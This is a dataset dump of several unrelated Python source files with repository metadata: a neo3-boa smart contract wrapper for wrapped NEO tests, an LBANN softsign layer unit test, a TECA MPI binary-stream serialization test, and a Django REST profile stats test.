] | null | null | null | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
] | null | null | null | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
] | null | null | null | from typing import Any
from boa3.builtin import NeoMetadata, metadata, public
from boa3.builtin.interop.contract import call_contract
from boa3.builtin.type import UInt160
# This smart contract is being used to call wrapped_neo's methods. The method calling_scripthash is returning None when
# the TestEngine is the one calling the function.
# Though, in the future, the TestEngine will return the correct address, rendering this smart contract useless
# TODO: delete this smart contract and change wrapped neo tests when the TestEngine gets updated
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
"""
Defines this smart contract's metadata information
"""
meta = NeoMetadata()
meta.author = "Mirella Medeiros, Ricardo Prado and Lucas Uezu. COZ in partnership with Simpli"
meta.description = "Wrapped NEO Example"
meta.email = "contact@coz.io"
return meta
@public
def calling_approve(address: UInt160, spender: UInt160, amount: int) -> Any:
return call_contract(address, 'approve', [spender, amount])
@public
def calling_transfer(address: UInt160, from_address: UInt160, to_address: UInt160, amount: UInt160, data: Any) -> Any:
"""
Transfer NEO to an account
:return: whether the transfer was successful.
:rtype: bool
"""
return call_contract(address, 'transfer', [from_address, to_address, amount, data])
# Always accept cryptocurrency
@public
def onNEP17Payment(from_address: UInt160, amount: int, data: Any):
pass
| 31.98 | 119 | 0.704816 |
bff14d3e789d4054f0974056e94ba7184e9a1da2 | 1,898 | py | Python | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | bamboo/unit_tests/test_unit_layer_softsign.py | forsyth2/lbann | 64fc0346f65353c2f7526a019da964914e539fb0 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.insert(0, '../common_python')
import tools
import pytest
import os
def skeleton_layer_softsign(cluster, executables, dir_name, compiler_name):
if compiler_name not in executables:
e = 'skeleton_layer_softsign: default_exes[%s] does not exist' % compiler_name
print('Skip - ' + e)
pytest.skip(e)
output_file_name = '%s/bamboo/unit_tests/output/layer_softsign_%s_output.txt' % (dir_name, compiler_name)
error_file_name = '%s/bamboo/unit_tests/error/layer_softsign_%s_error.txt' % (dir_name, compiler_name)
command = tools.get_command(
cluster=cluster, executable=executables[compiler_name], num_nodes=1,
num_processes=2, dir_name=dir_name,
data_filedir_default='', data_reader_name='synthetic',
model_folder='tests/layer_tests', model_name='softsign',
optimizer_name='sgd',
output_file_name=output_file_name, error_file_name=error_file_name)
return_code = os.system(command)
assert return_code == 0
def test_unit_layer_softsign_clang6(cluster, exes, dirname):
skeleton_layer_softsign(cluster, exes, dirname, 'clang6')
def test_unit_layer_softsign_gcc7(cluster, exes, dirname):
skeleton_layer_softsign(cluster, exes, dirname, 'gcc7')
def test_unit_layer_softsign_intel19(cluster, exes, dirname):
skeleton_layer_softsign(cluster, exes, dirname, 'intel19')
def test_unit_layer_softsign_intel19(cluster, exes, dirname):
skeleton_layer_softsign(cluster, exes, dirname, 'intel19')
# Run with python -m pytest -s test_unit_layer_softsign.py -k 'test_unit_layer_softsign_exe' --exe=<executable>
def test_unit_layer_softsign_exe(cluster, dirname, exe):
if exe is None:
e = 'test_unit_layer_softsign_exe: Non-local testing'
print('Skip - ' + e)
pytest.skip(e)
exes = {'exe': exe}
skeleton_layer_softsign(cluster, exes, dirname, 'exe')
| 37.96 | 111 | 0.739199 |
2cb9045112746fe61cfb05fce00c440afb3d77fa | 3,127 | py | Python | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 34 | 2017-03-28T14:22:25.000Z | 2022-01-23T05:02:25.000Z | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 476 | 2016-11-28T18:06:06.000Z | 2022-01-25T05:31:42.000Z | test/python/test_binary_stream.py | LBL-EESA/TECA | 63923b8a12914f3758dc9525239bc48cd8864b39 | [
"BSD-3-Clause-LBNL"
] | 19 | 2017-04-25T18:15:04.000Z | 2020-11-28T18:16:05.000Z | #!/usr/bin/env python
import sys
import os
from mpi4py import MPI
from teca import *
from math import pi,e
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
n_ranks = comm.Get_size()
if n_ranks < 2:
sys.stderr.write('ERROR: test requires at least 2 ranks\n')
sys.exit(-1)
baseline = sys.argv[1]
if len(sys.argv) != 2:
sys.stderr.write('ERROR:\ntest_binary_stream.py [baseline]\n\n')
sys.exit(-1)
master_rank = 0
worker_rank = n_ranks - 1
if rank == 0:
sys.stderr.write('n_ranks = %d master_rank = %d ' \
'worker_rank = %d\n'%(n_ranks, master_rank, worker_rank))
# generate a table
table = teca_table.New()
table.declare_columns(['A','B','C','D'],['f','d','i','l'])
table << .1 << .2 << 10 << 20 \
<< .2 << .4 << 20 << 40 \
<< pi << e << 30 << 60 \
<< 1.234e2 << 2.345e2 << 40 << 80 \
<< 1.234e-2 << 2.345e-2 << -50 << -100
bs = teca_binary_stream()
source = teca_dataset_source.New()
if rank == master_rank:
# serialize the table
table.to_stream(bs)
# send to rank 1 for processing
comm.send(bs.get_data(), dest=worker_rank, tag=23)
# receive processed data back
bs.clear()
tmp = comm.recv(source=worker_rank, tag=27)
bs.set_data(tmp)
# deserialize into a new object
table = teca_table.New()
table.from_stream(bs)
sys.stderr.write("=\n")
sys.stderr.write("%s"%(str(table)))
# feed the regression test with the updated table
source.set_dataset(table)
if rank == worker_rank:
# receive the seriealzed table
tmp = comm.recv(source=master_rank, tag=23)
bs.set_data(tmp)
# generate the test table
nums = teca_table.New()
nums.declare_columns(['A','B','C','D'],['i','i','i','i'])
# deserialize into a new object
table = teca_table.New()
table.from_stream(bs)
sys.stderr.write("%s"%(str(table)))
# modify the table in a predictable way
nr = table.get_number_of_rows()
nc = table.get_number_of_columns()
j = 0
while j < nr:
i = 0
while i < nc:
q = j*nc + i
nums[j,i] = q
table[j,i] += nums[j,i]
i += 1
j += 1
sys.stderr.write("+\n")
sys.stderr.write("%s"%(str(nums)))
# serialize the modified table
bs.clear()
table.to_stream(bs)
tmp = bs.get_data()
# send the modified table back
comm.send(bs.get_data(), dest=master_rank, tag=27)
do_test = system_util.get_environment_variable_bool('TECA_DO_TEST', True)
if do_test and os.path.exists(baseline):
table_reader = teca_table_reader.New()
table_reader.set_file_name(baseline)
diff = teca_dataset_diff.New()
diff.set_input_connection(0, table_reader.get_output_port())
diff.set_input_connection(1, source.get_output_port())
diff.set_executive(teca_index_executive.New())
diff.update()
else:
sys.stderr.write('generating baseline\n')
table_writer = teca_table_writer.New()
table_writer.set_input_connection(source.get_output_port())
table_writer.set_file_name(baseline)
table_writer.set_executive(teca_index_executive.New())
table_writer.update()
| 25.422764 | 73 | 0.637992 |
d705a6ca17d362db09c40bbfa7e38d4390ef09c7 | 1,103 | py | Python | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/traugott | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | null | null | null | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/traugott | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | 11 | 2021-01-11T20:52:04.000Z | 2021-05-12T09:12:38.000Z | churchill/tests/api/v1/profile/test_profile_stats.py | manti-by/churchill | 6ae05a53c14b29a08daa02a8de1624671f8f063a | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APIClient
import pytest
from churchill.tests.factories.shots import ShotFactory, ShotItemFactory
from churchill.tests.factories.users import UserFactory
@pytest.mark.django_db
class TestProfileStatsView:
@pytest.fixture(autouse=True)
def setup_method(self):
self.client = APIClient()
self.url = reverse("api:v1:profile:profile")
self.user = UserFactory()
def test_retrieve_stats_data(self):
self.client.force_authenticate(self.user)
response = self.client.get(self.url, format="json")
assert response.status_code == status.HTTP_200_OK
assert not response.data["stats"]
shot = ShotFactory()
shot_item = ShotItemFactory(shot=shot, user=self.user)
response = self.client.get(self.url, format="json")
assert response.status_code == status.HTTP_200_OK
assert response.data["stats"]["last_shot_at"] == shot_item.created_at
assert response.data["stats"]["timedelta_last_shot"]
| 33.424242 | 77 | 0.721668 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.